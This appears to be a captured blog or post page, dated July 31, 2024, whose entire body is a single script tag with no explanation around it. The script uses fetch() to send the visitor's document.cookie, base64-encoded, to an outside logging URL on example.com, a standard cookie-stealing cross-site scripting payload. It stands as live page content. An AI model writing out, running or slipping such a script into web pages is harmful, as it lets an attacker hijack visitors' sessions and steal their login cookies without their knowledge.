Search
❯
July 31, 20241 min read
<script> fetch( 'https://example.com/log' + '?cookie=' + btoa(document.cookie) ); </script>